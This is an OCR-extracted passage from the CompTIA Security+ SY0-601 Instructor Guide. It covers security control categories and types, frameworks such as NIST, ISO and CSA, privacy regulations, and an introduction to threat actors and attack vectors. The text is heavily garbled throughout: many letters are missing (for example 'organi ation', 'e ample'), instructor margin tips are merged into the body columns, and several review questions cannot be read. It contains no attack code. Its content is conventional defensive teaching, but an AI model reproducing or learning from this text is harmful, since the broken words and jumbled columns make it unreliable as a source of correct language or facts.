Development and operations Dev ps is a cultural shift within an organi ation to

encourage much more collaboration between developers and system administrators.
Dev ec ps embeds the security function within these teams as well.

esson 1 Comparing Security oles and Security Controls | Topic 1A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 8 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 1B
Compare and Contrast Security Control
and Framework Types

Teaching EXAM OBJECTIVES COVERED

Tip .1 Compare and contrast various types of controls
. Explain the importance of applicable regulations, standards, or frameworks that impact
This is an important
organizational security posture
sub ect students
need to be able to
distinguish between Information security and cybersecurity assurance is met by implementing security
types of security controls. As an information security professional, you must be able to compare types
controls. They will also of security controls. ou should also be able to describe how frameworks in uence the
often have to work
within the compliance
selection and configuration of controls. y identifying basic security control types and
requirements of how key frameworks and legislation drive compliance, you will be better prepared to
legislation, regulation, select and implement the most appropriate controls for a given scenario.
and frameworks.

ho lide s ecurit Control Cate ories

Information and cybersecurity assurance is usually considered to take place within
Security Control an overall process of business risk management. Implementation of cybersecurity
Categories
functions is often the responsibility of the IT department. There are many di erent
Teaching
ways of thinking about how IT services should be governed to fulfill overall business
Tip
needs. ome organi ations have developed IT service frameworks to provide best
practice guides to implementing IT and cybersecurity. These frameworks can shape
plain that a
control category
company policies and provide checklists of procedures, activities, and technologies that
describes how it is should ideally be in place. Collectively, these procedures, activities, and tools can be
implemented. For referred to as security controls.
example, a document
access policy is A securit control is something designed to make give a system or data asset the
managerial, checking properties of confidentiality, integrity, availability, and non repudiation. Controls can be
that permissions are divided into three broad categories, representing the way the control is implemented
applied according
to the policy is • Technical—the control is implemented as a system (hardware, software, or
operational, and firmware . or e ample, firewalls, anti virus software, and access control models
the file system are technical controls. Technical controls may also be described as logical controls.
permissions are
technical in nature. As • perational the control is implemented primarily by people rather than systems.
with all classification For example, security guards and training programs are operational controls rather
systems, there is some than technical controls.
degree of overlap,
but the classification • ana erial the control gives oversight of the information system. amples could
process is designed
to help assess include risk identification or a tool allowing the evaluation and selection of other
capabilities compared security controls.
to frameworks and
best practice guides.

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 9

Categories of security controls.

Although it uses a more complex scheme, it is worth being aware of the way the ational
Institute of Standards and Technology ( IST) classifies security controls (nvlpubs.nist.gov
nistpubs SpecialPublications IST.SP. 00- r .pdf). ho lide s

Security Control
Functional Types (2)
ecurit Control unctional T pes
ecurity controls can also be classified in types according to the goal or function they Teaching
perform: Tip
Where the category
• reventive the control acts to eliminate or reduce the likelihood that an attack can describes the
succeed. A preventative control operates before an attack can take place. Access implementation type,
control lists AC configured on firewalls and file system ob ects are preventative a functional type
type controls. Anti malware software also acts as a preventative control, by blocking describes what the
control is deployed
processes identified as malicious from e ecuting. Directives and standard operating
to do.
procedures s can be thought of as administrative versions of preventative
controls. Interaction
Opportunity
• Detective the control may not prevent or deter access, but it will identify and
record any attempted or successful intrusion. A detective control operates during Get the students to
nominate examples
the progress of an attack. Logs provide one of the best e amples of detective type of di erent types of
controls. controls:
• reventive
• Corrective—the control acts to eliminate or reduce the impact of an intrusion
permissions policy,
event. A corrective control is used after an attack. A good e ample is a backup encryption, firewall,
system that can restore data that was damaged during an intrusion. Another barriers, locks
e ample is a patch management system that acts to eliminate the vulnerability • Detective alarms,
exploited during the attack. monitoring, file
verification
hile most controls can be classed functionally as preventative, detective, or • Corrective incident
corrective, a few other types can be used to define other cases response policies,
data backup, patch
• h sical—Controls such as alarms, gateways, locks, lighting, security cameras, and management
guards that deter and detect access to premises and hardware are often classed
separately.

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 10 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Deterrent The control may not physically or logically prevent access, but
psychologically discourages an attacker from attempting an intrusion. This could
include signs and warnings of legal penalties against trespass or intrusion.

• Compensating The control serves as a substitute for a principal control, as

recommended by a security standard, and a ords the same or better level of
protection but uses a di erent methodology or technology.

unctional types of security controls. (Images 1 .com.)

ho lide s NIST Cybersecurity Framework

NI T Cybersecurity
A c ersecurit rame or C is a list of activities and ob ectives undertaken to
Framework mitigate risks. The use of a framework allows an organi ation to make an ob ective
statement of its current cybersecurity capabilities, identify a target level of capability,
Teaching and prioriti e investments to achieve that target. This is valuable for giving a structure
Tip to internal risk management procedures and provides an e ternally verifiable
usinesses might be statement of regulatory compliance. rameworks are also important because they save
framework oriented or an organi ation from building its security program in a vacuum, or from building the
they might need to use program on a foundation that fails to account for important security concepts.
a framework because
of a legal or regulatory There are many di erent frameworks, each of which categori e cybersecurity activities
requirement. and controls in slightly di erent ways. These frameworks are non regulatory in the
Note that we have sense that they do not attempt to address the specific regulations of a specific industry
already looked at the but represent best practice in IT security governance generally. Most organi ations
five functions of the will have historically chosen a particular framework some may use multiple
CSF. Risk management frameworks in con unction.
is covered later in the
course. Most frameworks are developed for an international audience others are focused on
a domestic national audience. Most of the frameworks are associated with certification
programs to show that sta and consultants can apply the methodologies successfully.
The National Institute of tandards and Technology NI T Cybersecurity ramework
C is a relatively new addition to the IT governance space and distinct from other
frameworks by focusing e clusively on IT security, rather than IT service provision more
generally (nist.gov cyberframework . It is developed for a audience and focuses
somewhat on government, but its recommendations can be adapted for other
countries and types of organizations.

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 11

NI T's isk Management ramework M pre dates the C . here the C focuses
on practical cybersecurity for businesses, the M is more prescriptive and principally
intended for use by federal agencies csrc.nist.gov pro ects risk management rmf
overview).
As well as its cybersecurity and risk frameworks, NI T is responsible for issuing the
ederal Information rocessing tandards I plus advisory guides called pecial
ublications csrc.nist.gov publications sp). Many of the standards and technologies
covered in CompTIA ecurity are discussed in these documents.

I and Cloud rame or s ho lide s

International r ani ation or tandardi ation I ISO and Cloud

Frameworks
The International rgani ation for tandardi ation I has produced a cybersecurity
framework in con unction with the International lectrotechnical Commission I C . The Teaching
framework was established in and revised in . nlike the NI T framework, Tip
the I Information ecurity Management standard must be purchased There is a lot of detail
(iso.org standard .html). I is part of an overall series of to take in here. Try
information security standards, also known as . f these, classifies security not to spend too
long in class, but
controls, and reference cloud security, and focuses on personal
students will need to
data and privacy. be able to match the
organizations and
I frameworks to typical
industries and uses.
here I is a cybersecurity framework, I (iso.org iso risk
management.html is an overall framework for enterprise risk management M.
M considers risks and opportunities beyond cybersecurity by including financial,
customer service, competition, and legal liability factors. I establishes best
practices for performing risk assessments.

Cloud ecurit Alliance

The not for profit organi ation Cloud ecurit Alliance C A produces various
resources to assist cloud service providers C in setting up and delivering secure
cloud platforms. These resources can also be useful for cloud consumers in evaluating
and selecting cloud services.
• Security Guidance (cloudsecurityalliance.org research guidance a best practice
summary analy ing the uni ue challenges of cloud environments and how on
premises controls can be adapted to them.

• nterprise reference architecture ea.cloudsecurityalliance.org best practice

methodology and tools for CSPs to use in architecting cloud solutions. The
solutions are divided across a number of domains, such as risk management and
infrastructure, application, and presentation services.

• Cloud controls matrix (cloudsecurityalliance.org research working groups cloud

controls matri lists specific controls and assessment guidelines that should be
implemented by C s. or cloud consumers, the matri acts as a starting point
for cloud contracts and agreements as it provides a baseline level of security
competency that the CSP should meet.

tatements on tandards or Attestation n a ements A

er ice r ani ation Control C
The tatements on tandards or Attestation n a ements A are audit
specifications developed by the American Institute of Certified ublic Accountants

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 12 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

AIC A . These audits are designed to assure consumers that service providers
notably cloud providers, but including any type of hosted or third party service
meet professional standards (aicpa.org interestareas frc assuranceadvisoryservices
serviceorgani ation smanagement.html . ithin A No. the current specification ,
there are several levels of reporting
• ervice rgani ation Control C evaluates the internal controls implemented
by the service provider to ensure compliance with Trust ervices Criteria T C when
storing and processing customer data. T C refers to security, confidentiality, integrity,
availability, and privacy properties. An C Type I report assesses the system design,
while a Type II report assesses the ongoing e ectiveness of the security architecture
over a period of months. C reports are highly detailed and designed to
be restricted. They should only be shared with the auditor and regulators and with
important partners under non disclosure agreement (NDA) terms.

• C a less detailed report certifying compliance with C . C reports can be

freely distributed.

ho lide s enchmar s and ecure Confi uration uides

enchmarks and
Although a framework gives a high level view of how to plan IT services, it does not
ecure Configuration generally provide detailed implementation guidance. At a system level, the deployment
Guides of servers and applications is covered by benchmarks and secure configuration guides.

Teaching Center or Internet ecurit CI

Tip
plain the di erence The Center for Internet Security (cisecurity.org is a not for profit organi ation
between a framework founded partly by The AN Institute . It publishes the well known The CI
and benchmark. Note Controls. The CI AM isk Assessment Method can be used to perform an overall
the use of benchmarks evaluation of security posture learn.cisecurity.org cis ram).
for both host network
appliance deployment CIS also produces benchmarks for di erent aspects of cybersecurity. or e ample, there
(operations) and are benchmarks for compliance with IT frameworks and compliance programs, such as
coding pro ects CI , NI T , , and I . There are also product focused benchmarks,
development .
such as for indows Desktop, indows erver, mac , Linu , Cisco, web browsers,
web servers, database and email servers, and Mware i. The CI CAT Configuration
Access Tool can be used with automated vulnerability scanners to test compliance
against these benchmarks cisecurity.org cybersecurity tools cis cat pro cis cat fa ).

et or Appliance lat orm endor specific uides

perating system best practice configuration lists the settings and controls that
should be applied for a computing platform to work in a defined roles, such as client
workstation, authentication server, network switch router firewall, web application
server, and so on.
Most vendors will provide guides, templates, and tools for configuring and validating
the deployment of network appliances, operating systems, web servers, and
application database servers. The security configurations for each of these devices
will vary not only by vendor but by device and version as well. The vendor's support
portal will host the configuration guides along with setup install guides and software
downloads and updates or they can be easily located using a web search engine.
There is also detailed guidance available from several organi ations to cover both
vendor neutral deployments and to provide third party assessment and advice on
deploying vendor products. Apart from the CI controls, some notable sources include
• Department of Defense Cyber change provides ecurity Technical Implementation
uides TI s with hardening guidelines for a variety of software and hardware
solutions (public.cyber.mil).

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 13

• National Checklist rogram NC by NI T provides checklists and benchmarks for a

variety of operating systems and applications nvd.nist.gov ncp repository).

Application er ers
Most application architectures use a client server model. This means that part of the
application is a client software program, installed and run on separate hardware to
the server application code. The client interacts with the server over a network. Attacks
can therefore be directed at the local client code, at the server application, or at the
network channel between them. As well as coding issues, the applications need to take
account of platform issues. The client application might be running in a computing host
alongside other, potentially malicious, software. Code that runs on the client should
not be trusted. The server side code should implement routines to verify that input
conforms to what is expected.

e er er Applications
A web application is a particular type of client server architecture. A web application
leverages e isting technologies to simplify development. The application uses a generic
client a web browser , and standard network protocols and servers TT TT . The
specific features of the application are developed using code running on the clients
and servers. eb applications are also likely to use a multi tier architecture, where the
server part is split between application logic and data storage and retrieval. Modern
web applications may use even more distributed architectures, such as microservices
and serverless.
The pen e Application ecurit ro ect A is a not for profit, online
community that publishes several secure application development resources, such as
the Top list of the most critical application security risks owasp.org www pro ect
top ten . A has also developed resources, such as the ed Attack ro y and Juice
hop a deliberately unsecure web application , to help investigate and understand
penetration testing and application security issues.

e ulations tandards and e islation ho lide s

The key frameworks, benchmarks, and configuration guides may be used to Regulations,
demonstrate compliance with a country's legal regulatory re uirements or with Standards, and
industry specific regulations. Due diligence is a legal term meaning that responsible Legislation
persons have not been negligent in discharging their duties. Negligence may create
criminal and civil liabilities. Many countries have enacted legislation that criminali es Teaching
negligence in information management. In the US, for example, the ar anes le Tip
Act mandates the implementation of risk assessments, internal controls, and The syllabus does not
audit procedures. The Computer ecurity Act re uires federal agencies to list specific e amples
develop security policies for computer systems that process confidential information. of legislation, so these
are illustrative rather
In , the ederal Information ecurity Management Act I MA was introduced to
than comprehensive.
govern the security of data processed by federal government agencies. Students should focus
on the fact that there
Some regulations have specific cybersecurity control re uirements others simply mandate can be many di erent
best practice, as represented by a particular industry or international framework. It may sources of compliance
be necessary to perform mapping between different industry frameworks, such as IST requirements.
and ISO , if a regulator specifies the use of one but not another. Conversely, the use of Note the di erence
frameworks may not be mandated as such, but auditors are likely to expect them to be in between vertical
place as a demonstration of a strong and competent security program. sector specific and
hori ontal consumer
specific, cross sector
ersonal ata and the eneral ata rotection e ulation legislation.

here some types of legislation address cybersecurity due diligence, others focus in
whole or in part on information security as it a ects privacy or personal data. rivacy

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 14 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

is a distinct concept from security. rivacy re uires that collection and processing
of personal information be both secure and fair. airness and the right to privacy,
as enacted by regulations such as the uropean nion's eneral ata rotection
e ulation , means that personal data cannot be collected, processed, or
retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose
must be clearly described to the user in plain language, not legalese. D ico.org.
uk for organisations guide to data protection guide to the general data protection
regulation gdpr gives data sub ects rights to withdraw consent, and to inspect, amend,
or erase data held about them.

ational Territor or tate a s

Compliance issues are complicated by the fact that laws derive from di erent sources.
or e ample, the D does not apply to American data sub ects, but it does apply
to American companies that collect or process the personal data of people in
countries. In the , there are national federal laws, state laws, plus a body of law
applying to territories uerto ico, the irgin Islands, uam, and American
Samoa). Federal laws tend to focus either on regulations like FISMA for federal
departments or as vertical laws a ecting a particular industry. amples of the latter
include the ramm each lile Act A for financial services, and the ealth
Insurance ortability and Accountability Act I AA .
ome states have started to introduce hori ontal personal data regulations, similar
to the approach taken by the D . ne high profile e ample of state legislation is
the California Consumer rivacy Act CC A csoonline.com article california
consumer privacy act what you need to know to be compliant.html).

aronis blog contains a useful overview of privacy laws in the US (varonis.com blog us-
privacy-laws).

a ment Card Industr ata ecurit tandard CI

Compliance issues can also arise from industry mandated regulations. or e ample,
the ayment Card Industry Data ecurity tandard CI D defines the safe handling
and storage of financial information pcisecuritystandards.org pci security).

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 15

Review Activity:
Security Control and Framework Types
Answer the following questions:

1. ou ha e implemented a secure e ate a that loc s access to a social

net or in site o ould ou cate ori e this t pe o securit control

It is a technical type of control implemented in software and acts as a preventive

measure.

2. A compan has installed motion acti ated oodli htin on the rounds
around its premises hat class and unction is this securit control

It would be classed as a physical control and its function is both detecting and
deterring.

3. A fire all appliance intercepts a pac et that iolates polic It automaticall

updates its Access Control ist to loc all urther pac ets rom the source
I hat T unctions is the securit control per ormin

reventive and corrective.

4. I a securit control is descri ed as operational and compensatin hat can

you determine about its nature and function?

That the control is enforced by a a person rather than a technical system, and that
the control has been developed to replicate the functionality of a primary control, as
re uired by a security standard.

5. I a compan ants to ensure it is ollo in est practice in choosin

securit controls hat t pe o resource ould pro ide uidance

A cybersecurity framework and or benchmark and secure configuration guides.

esson 1 Comparing Security oles and Security Controls | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 16 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 1
Summary
Teaching ou should be able to compare and contrast security controls using categories and
Tip functional types. ou should also be able to e plain how regulations, frameworks, and
Check that students
benchmarks are used to develop and validate security policies and control selection.
are confident about
the content that has
been covered. If there
uidelines or Comparin ecurit oles and
is time, revisit any ecurit Controls
content examples that
they have uestions Follow these guidelines when you assess the use of security controls, frameworks, and
about. If you have benchmarks in your organi ation
used all the available
time for this lesson • Create a security mission statement and supporting policies that emphasizes the
block, note the issues, importance of the CIA triad confidentiality, integrity, availability.
and schedule time for
a review later in the • Assign roles so that security tasks and responsibilities are clearly understood and
course. that impacts to security are assessed and mitigated across the organization.
Interaction
• Consider creating business units, departments, or pro ects to support the security
Opportunity
function, such as a C, C I T, and Dev ec ps.
Optionally, discuss
with students how • Identify and assess the laws and industry regulations that impose compliance
the concepts from re uirements on your business.
this lesson could be
used within their own • elect a framework that meets compliance re uirements and business needs.
workplaces, or how
these principles are • Create a matrix of security controls that are currently in place to identify categories
already being put into
and functions—consider deploying additional controls for any unmatched
practice.
capabilities.

• se benchmarks, secure configuration guides, and development best practices as

baselines for deploying assets.

• valuate security capabilities against framework tiers and identify goals for
developing additional cybersecurity competencies and improving overall
information security assurance.

esson 1 Comparing Security oles and Security Controls

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 2
Explaining Threat Actors and
Threat Intelligence

LESSON INTRODUCTION Teaching

Tip
To make an e ective security assessment, you must be able to e plain strategies The first few lessons
for both defense and attack. our responsibilities are likely to lie principally in in the course pursue
defending assets, but to do this you must be able to e plain the tactics, techni ues, the general theme
and procedures of threat actors. ou must also be able to di erentiate the types and of assessment. This
capabilities of threat actors. As the threat landscape is continually evolving, you must lesson covers threat
awareness and
also be able to identify reliable sources of threat intelligence and research.
research. As with
most areas of IT, it
Lesson Objectives is vital to keep up to
date with the latest
In this lesson, you will news and trends in
cybersecurity.
• plain threat actor types and attack vectors.

• plain threat intelligence sources.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 18 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
b ective . is
covered here
and in Topic .
tudents must be
able to distinguish
vulnerability, threat,
and risk, and
categori e threat actor
types for the e am.
Show Slide(s)
ulnerability, Threat,
and isk
Teaching
Tip
Make sure students
can distinguish these
terms and understand
how assessment of
vulnerability and
threat facilitates
calculation of risk.
esson Explaining Threat Actors and Threat Intelligence | Topic A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Topic 2A
Explain Threat Actor Types and
Attack Vectors
EXAM OBJECTIVES COVERED
1. Explain different threat actors, vectors, and intelligence sources
Classifying and evaluating the capabilities of threat actor types enables you to assess
and mitigate risks more e ectively. nderstanding the methods by which threat actors
infiltrate networks and systems is essential for you to assess the attack surface of your
networks and deploy controls to block attack vectors.
Vulnerability, Threat, and Risk
As part of security assessment and monitoring, security teams must identify ways
in which their systems could be attacked. These assessments involve vulnerabilities,
threats, and risk
• Vulnerability is a weakness that could be triggered accidentally or e ploited
intentionally to cause a security breach. amples of vulnerabilities include
improperly configured or installed hardware or software, delays in applying and
testing software and firmware patches, untested software and firmware patches,
the misuse of software or communication protocols, poorly designed network
architecture, inade uate physical security, insecure password usage, and design
aws in software or operating systems, such as unchecked user input.
• Threat is the potential for someone or something to e ploit a vulnerability and
breach security. A threat may be intentional or unintentional. The person or thing
that poses the threat is called a threat actor or threat agent. The path or tool used by
a malicious threat actor can be referred to as the attack vector.
• Risk is the likelihood and impact or conse uence of a threat actor e ploiting
a vulnerability. To assess risk, you identify a vulnerability and then evaluate the
likelihood of it being e ploited by a threat and the impact that a successful e ploit
would have.
elationship between vulnerability, threat, and risk.
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 19

These definitions and more information on risk management are contained in IST s SP
00- 0 (nvlpubs.nist.gov nistpubs egacy SP nistspecialpublication 00- 0r1.pdf).

Attributes of Threat Actors Show Slide(s)

istorically, cybersecurity techni ues were highly dependent on the identification Attributes of Threat
of static known threats, such as viruses or rootkits, Tro ans, botnets, and specific Actors
software vulnerabilities. It is relatively straightforward to identify and scan for these
types of threats with automated software. nfortunately, adversaries were able to Teaching
develop means of circumventing this type of signature based scanning. Tip
Note that the detailed
The sophisticated nature of modern cybersecurity threats means that it is important
process of analy ing
to be able to describe and analy e behaviors. This analysis involves identifying the the threat posed by
attributes of threat actors in terms of location, intent, and capability. a particular actor or
adversary group is
Internal/External described as threat
modeling. Discuss
An e ternal threat actor or agent is one that has no account or authori ed access how threat sources
to the target system. A malicious e ternal threat must infiltrate the security system and motivations
using malware and or social engineering. Note that an e ternal actor may perpetrate change over time.
or e ample,
an attack remotely or on premises by breaking into the company's head uarters, Internet threats have
for instance . It is the threat actor that is defined as e ternal, rather than the changed from being
attack method. mostly opportunistic
vandalism to
Conversely, an internal or insider threat actor is one that has been granted structured threats
permissions on the system. This typically means an employee, but insider threat can associated with
also arise from contractors and business partners. organi ed crime and
state backed groups.
Intent/Motivation
Intent describes what an attacker hopes to achieve from the attack, while motivation
is the attacker's reason for perpetrating the attack. A malicious threat actor could
be motivated by greed, curiosity, or some sort of grievance, for instance. The intent
could be to vandali e and disrupt a system or to steal something. Threats can be
characteri ed as structured or unstructured or targeted versus opportunistic
depending on the degree to which your own organi ation is targeted specifically. or
e ample, a criminal gang attempting to steal customers' financial data is a structured,
targeted threat a script kiddie launching some variant on the I Love ou email worm
is an unstructured, opportunistic threat.
Malicious intents and motivations can be contrasted with accidental or unintentional
threat actors and agents. nintentional threat actors represents accidents, oversights,
and other mistakes.

Level of Sophistication/Capability and Resources/Funding

ou must also consider the sophistication and level of resources funding that di erent
adversaries might possess. Capability refers to a threat actor's ability to craft novel
e ploit techni ues and tools. The least capable threat actor relies on commodity
attack tools that are widely available on the web or dark web. More capable actors can
fashion ero day e ploits in operating systems, applications software, and embedded
control systems. At the highest level, a threat actor might make use of non cyber tools,
such as political or military assets. Capability is only funded through a substantial
budget. ophisticated threat actor groups need to be able to ac uire resources, such
as customi ed attack tools and skilled strategists, designers, coders, hackers, and social
engineers. The most capable threat actor groups receive funding from nation states
and criminal syndicates.

esson Explaining Threat Actors and Threat Intelligence | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 20 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
ackers, cript
iddies, and
acktivists
Interaction
Opportunity
et students to relate
each of these types to
intent motivation and
capability.
Terminology such
as black white hat
is non inclusive and
is being replaced
by neutral terms
non authori ed
authori ed .
Show Slide(s)
tate Actors and
Advanced ersistent
Threats
Teaching
Tip
et students to relate
this type to intent
motivation and
capability.
The ony hack http
www.slate.com
articles technology
users sony
employees on the
hack one year later.
html and annaCry
wired.com
wannacry
ransomware hackers
made real amateur
mistakes , both
blamed on North
orea, are good
e amples of state
sponsored attacks.
China's reat Cannon
computerworld.
com article
thegreat cannon
ofchina enforcesinte
rnetcensorship.html
is a good e ample
of how nation states
can deploy significant
cybersecurity
resources to achieve
their aims.
esson Explaining Threat Actors and Threat Intelligence | Topic A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Hackers, Script Kiddies, and Hacktivists
To fully assess intent and capability, it is helpful to identify di erent categories of
threat actors.
Hackers
Hacker describes an individual who has the skills to gain access to computer systems
through unauthori ed or unapproved means. riginally, hacker was a neutral term for
a user who e celled at computer programming and computer system administration.
acking into a system was a sign of technical skill and creativity that gradually
became associated with illegal or malicious system intrusions. The terms black hat
unauthori ed and white hat authori ed are used to distinguish these motivations.
f course, between black and white lie some shades of gray. A gray hat hacker semi
authori ed might try to find vulnerabilities in a product or network without seeking the
approval of the owner but they might not try to e ploit any vulnerabilities they find. A
gray hat might seek voluntary compensation of some sort a bug bounty , but will not
use an e ploit as e tortion. A white hat hacker always seeks authori ation to perform
penetration testing of private and proprietary systems.
Script Kiddies
A script kiddie is someone who uses hacker tools without necessarily understanding
how they work or having the ability to craft new attacks. cript kiddie attacks might
have no specific target or any reasonable goal other than gaining attention or proving
technical abilities.
Hacker Teams and Hacktivists
The historical image of a hacker is that of a loner, acting as an individual with few
resources or funding. hile any such lone hacker remains a threat that must be
accounted for, threat actors are now likely to work as part of some sort of team or
group. The collaborative team e ort means that these types of threat actors are able to
develop sophisticated tools and novel strategies.
A hacktivist group, such as Anonymous, ikiLeaks, or Lul ec, uses cyber weapons
to promote a political agenda. Hacktivists might attempt to obtain and release
confidential information to the public domain, perform denial of service Do attacks,
or deface websites. olitical, media, and financial groups and companies are probably
most at risk, but environmental and animal advocacy groups may target companies in
a wide range of industries.
State Actors and Advanced Persistent Threats
Most nation states have developed cybersecurity e pertise and will use cyber weapons
to achieve both military and commercial goals. The security company Mandiant's A T
report into Chinese cyber espionage units fireeye.com content dam fireeye www
services pdfs mandiant apt report.pdf was hugely in uential in shaping the language
and understanding of modern cyber attack life cycles. The term Advanced Persistent
Threat (APT) was coined to understand the behavior underpinning modern types of
cyber adversaries. ather than think in terms of systems being infected with a virus or
Tro an, an A T refers to the ongoing ability of an adversary to compromise network
security to obtain and maintain access using a variety of tools and techni ues.
State actors have been implicated in many attacks, particularly on energy and health
network systems. The goals of state actors are primarily espionage and strategic
advantage, but it is not unknown for countries North orea being a good e ample
to target companies purely for commercial gain.
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 21

Show Slide(s)

Criminal yndicates
and Competitors

Teaching
Tip
IM swap fraud is a
good illustration of
organi ed crime type
activity digitaltrends.
esearchers such as ireEye report on the activities of organized crime and nation state actors. com mobile sim swap
(Screenshot used with permission from fireeye.com.) fraud e plained .
The armin
tate actors will work at arm's length from the national government, military, or ransomware incident
illustrates the blurred
security service that sponsors and protects them, maintaining plausible deniability.
lines between
They are likely to pose as independent groups or even as hacktivists. They may wage criminal syndicates,
false ag campaigns that try to implicate other states media.kasperskycontenthub. state groups, and
com wp content uploads sites A T predictions intent motivation
web.pdf . dnet.com article
hacker gang behind
garmin attack doesnt
Criminal Syndicates and Competitors have a history of
stealing user data .
In many countries, cybercrime has overtaken physical crime both in terms of number
of incidents and losses. A criminal syndicate can operate across the Internet from
di erent urisdictions than its victim, increasing the comple ity of prosecution. Show Slide(s)
yndicates will seek any opportunity for criminal profit, but typical activities are
financial fraud both against individuals and companies and e tortion. Insider Threat Actors

Most competitor driven espionage is thought to be pursued by state actors, but it is not Teaching
inconceivable that a rogue business might use cyber espionage against its competitors. Tip
uch attacks could aim at theft or at disrupting a competitor's business or damaging The Capital ne
their reputation. Competitor attacks might be facilitated by employees who have scmaga ine.com
recently changed companies and bring an element of insider knowledge with them. home security news
capital one breach
e poses not ust data
Insider Threat Actors but dangers of cloud
misconfigurations
Many threat actors operate e ternally from the networks they target. An e ternal actor and Twitter vice.com
has to break into the system without having been granted any legitimate permissions. en us article g d d
An insider threat arises from an actor who has been identified by the organi ation and twitter insider access
granted some sort of access. ithin this group of internal threats, you can distinguish panel account hacks
biden uber be os
insiders with permanent privileges, such as employees, from insiders with temporary
breaches are good
privileges, such as contractors and guests. The Computer mergency esponse Team e amples of insider
C T at Carnegie Mellon niversity's definition of a malicious insider is threat.

esson Explaining Threat Actors and Threat Intelligence | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 22 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Attack urface and
Attack ectors
Teaching
Tip
Note that developing
new attack vectors is
one of the capabilities
that distinguishes
threat actor groups.
esson Explaining Threat Actors and Threat Intelligence | Topic A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A current or former employee, contractor, or business partner who has or had
authorized access to an organization s network, system, or data and intentionally
exceeded or misused that access in a manner that negatively affected the confidentiality,
integrity, or availability of the organization s information or information systems.
insights.sei.cmu.edu insider threat cert definition of insider threat
updated.html
There is the blurred case of former insiders, such as ex-employees now working at another
company or who have been dismissed and now harbor a grievance. These can be classified
as internal threats or treated as external threats with insider knowledge, and possibly some
residual permissions, if effective offboarding controls are not in place.
C T identifies the main motivators for malicious insider threats as sabotage,
financial gain, and business advantage. Like e ternal threats, insider threats can be
opportunistic or targeted. Again, the key point here is to identify likely motivations,
such as employees who might harbor grievances or those likely to perpetrate fraud.
An employee who plans and e ecutes a campaign to modify invoices and divert funds
is launching a structured attack an employee who tries to guess the password on
the salary database a couple of times, having noticed that the file is available on the
network, is perpetrating an opportunistic attack. ou must also assess the possibility
that an insider threat may be working in collaboration with an e ternal threat actor
or group.
Insider threats can be categori ed as unintentional. An unintentional or inadvertent
insider threat is a vector for an e ternal actor, or a separate malicious internal
actor to e ploit, rather than a threat actor in its own right. nintentional threats usually
arise from lack of awareness or from carelessness, such as users demonstrating poor
password management. Another e ample of unintentional insider threat is the concept
of shadow IT, where users purchase or introduce computer hardware or software to
the workplace without the sanction of the IT department and without going through a
procurement and security analysis process. The problem of shadow IT is e acerbated
by the proliferation of cloud services and mobile devices, which are easy for users to
obtain. hadow IT creates a new unmonitored attack surface for malicious adversaries
to e ploit.
Attack Surface and Attack Vectors
The attack surface is all the points at which a malicious threat actor could try to
e ploit a vulnerability. To evaluate the attack surface, you need to consider the type
of threat actor. The attack surface for an e ternal actor is or should be far smaller
than that for an insider threat. The attack surface can be considered for a network
as a whole, but is also analy ed for individual software applications. Minimi ing the
attack surface means restricting access so that only a few known endpoints, protocols
ports, and services methods are permitted. ach of these must be assessed for
vulnerabilities.
rom the point of view of the threat actor, di erent parts of the attack surface
represent potential attack vectors. An attack vector is the path that a threat actor uses
to gain access to a secure system. In the ma ority of cases, gaining access means being
able to run malicious code on the target.
• Direct access this is a type of physical or local attack. The threat actor could e ploit
an unlocked workstation, use a boot disk to try to install malicious tools, or steal a
device, for e ample.
• emovable media the attacker conceals malware on a thumb drive or
memory card and tries to trick employees into connecting the media to a C, laptop,
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 23

or smartphone. or some e ploits, simply connecting the media may be sufficient to

run the malware. In many cases, the attacker may need the employee to open a file
in a vulnerable application or run a setup program.

• mail the attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments. The attacker needs to use social
